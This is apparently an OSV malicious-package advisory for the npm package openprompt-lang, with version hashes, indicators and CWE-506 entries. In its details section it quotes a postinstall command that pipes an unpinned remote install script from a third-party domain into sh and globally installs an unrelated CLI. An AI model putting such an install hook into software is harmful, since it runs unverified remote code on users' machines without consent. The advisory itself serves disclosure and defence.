MAL-2026-4630

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4630
Published
2026-05-23T23:03:36Z
Modified
2026-06-12T20:01:55.529900539Z
Summary
Malicious code in openprompt-lang (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2)

On every npm install, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to sh with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (@opencode/cli), mutating the developer's global npm environment as a side effect of installing this library.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.3.0"
            ],
            "sha256": "0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb",
            "modified_time": "2026-05-25T05:35:48Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:53.3295444Z",
            "id": "IN-MAL-2026-004585"
        },
        {
            "versions": [
                "1.2.6"
            ],
            "sha256": "19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45",
            "modified_time": "2026-05-24T00:58:58Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:34.289865541Z",
            "id": "IN-MAL-2026-004423"
        },
        {
            "versions": [
                "1.2.6"
            ],
            "sha256": "2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f",
            "source": "amazon-inspector",
            "modified_time": "2026-05-24T00:57:45Z",
            "import_time": "2026-05-26T05:52:34.183494259Z",
            "id": "IN-MAL-2026-004422"
        },
        {
            "versions": [
                "1.2.7"
            ],
            "sha256": "560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c",
            "source": "amazon-inspector",
            "modified_time": "2026-05-24T02:29:05Z",
            "import_time": "2026-05-26T05:52:37.338586987Z",
            "id": "IN-MAL-2026-004449"
        },
        {
            "versions": [
                "1.2.4"
            ],
            "sha256": "a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d",
            "source": "amazon-inspector",
            "modified_time": "2026-05-24T00:38:07Z",
            "import_time": "2026-05-26T05:52:33.29493036Z",
            "id": "IN-MAL-2026-004414"
        },
        {
            "versions": [
                "1.2.4"
            ],
            "sha256": "a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8",
            "source": "amazon-inspector",
            "modified_time": "2026-05-24T00:37:20Z",
            "import_time": "2026-05-26T05:52:33.159133434Z",
            "id": "IN-MAL-2026-004413"
        },
        {
            "versions": [
                "1.2.1"
            ],
            "sha256": "b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a",
            "modified_time": "2026-05-24T00:14:52Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-004409",
            "import_time": "2026-05-26T05:52:32.704275064Z"
        },
        {
            "versions": [
                "1.2.0"
            ],
            "sha256": "e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92",
            "source": "amazon-inspector",
            "modified_time": "2026-05-23T23:35:56Z",
            "import_time": "2026-05-26T05:52:31.667285387Z",
            "id": "IN-MAL-2026-004402"
        },
        {
            "versions": [
                "1.2.1"
            ],
            "sha256": "db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0",
            "modified_time": "2026-05-24T00:13:43Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-004408",
            "import_time": "2026-05-26T05:52:32.417343895Z"
        },
        {
            "versions": [
                "1.2.2"
            ],
            "sha256": "29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992",
            "modified_time": "2026-05-24T00:22:56Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:32.929380025Z",
            "id": "IN-MAL-2026-004411"
        },
        {
            "versions": [
                "1.2.3"
            ],
            "sha256": "4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48",
            "modified_time": "2026-05-24T00:33:14Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:33.028301822Z",
            "id": "IN-MAL-2026-004412"
        },
        {
            "versions": [
                "1.2.7"
            ],
            "sha256": "aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c",
            "modified_time": "2026-05-24T02:27:50Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:37.228436646Z",
            "id": "IN-MAL-2026-004448"
        },
        {
            "versions": [
                "1.1.0"
            ],
            "sha256": "b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626",
            "source": "amazon-inspector",
            "modified_time": "2026-05-23T23:03:36Z",
            "import_time": "2026-05-26T05:52:31.353973464Z",
            "id": "IN-MAL-2026-004399"
        },
        {
            "versions": [
                "1.2.2"
            ],
            "sha256": "e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d",
            "modified_time": "2026-05-24T00:22:04Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:32.799550433Z",
            "id": "IN-MAL-2026-004410"
        },
        {
            "versions": [
                "1.3.0"
            ],
            "sha256": "90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913",
            "modified_time": "2026-05-25T05:37:21Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:53.518281193Z",
            "id": "IN-MAL-2026-004586"
        },
        {
            "versions": [
                "1.1.0"
            ],
            "sha256": "c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07",
            "modified_time": "2026-05-23T23:03:37Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:31.4594297Z",
            "id": "IN-MAL-2026-004400"
        },
        {
            "versions": [
                "1.2.0"
            ],
            "sha256": "c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d",
            "modified_time": "2026-05-23T23:36:56Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:31.859851238Z",
            "id": "IN-MAL-2026-004404"
        },
        {
            "versions": [
                "1.5.0"
            ],
            "sha256": "07bfc28ae30a03d8d79f22fc2a501bce090bd036a51b0ee492fcba9a69e9088d",
            "modified_time": "2026-06-12T19:09:46Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:11.989495545Z",
            "id": "IN-MAL-2026-006135"
        },
        {
            "versions": [
                "1.5.0"
            ],
            "sha256": "24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2",
            "modified_time": "2026-06-12T19:09:44Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:11.90069696Z",
            "id": "IN-MAL-2026-006134"
        },
        {
            "versions": [
                "1.6.0"
            ],
            "sha256": "299b80de6190eddb1974c3294caa88234d1e14e23ba128ea1c4b2a42c332627a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:09:47Z",
            "import_time": "2026-06-12T19:44:12.178874224Z",
            "id": "IN-MAL-2026-006137"
        },
        {
            "versions": [
                "1.6.0"
            ],
            "sha256": "b196bf077c9878420524b249d6d224cdb066646b7ae5b2ce6aa7e53b13e6e7ed",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:09:46Z",
            "import_time": "2026-06-12T19:44:12.074426677Z",
            "id": "IN-MAL-2026-006136"
        }
    ]
}
References
Credits

Affected packages

npm / openprompt-lang

Package

Affected ranges

Affected versions

1.*
1.1.0
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.6
1.2.7
1.3.0
1.5.0
1.6.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "openprompt-lang-1.3.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==",
                "sha1": "d9b5efbc402ec6a1373b98740a72573274325873"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58",
            "path": "scripts/postinstall.js",
            "tlsh": "4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"
        }
    ],
    "domains": [
        "34.9.16.104.in-addr.arpa"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]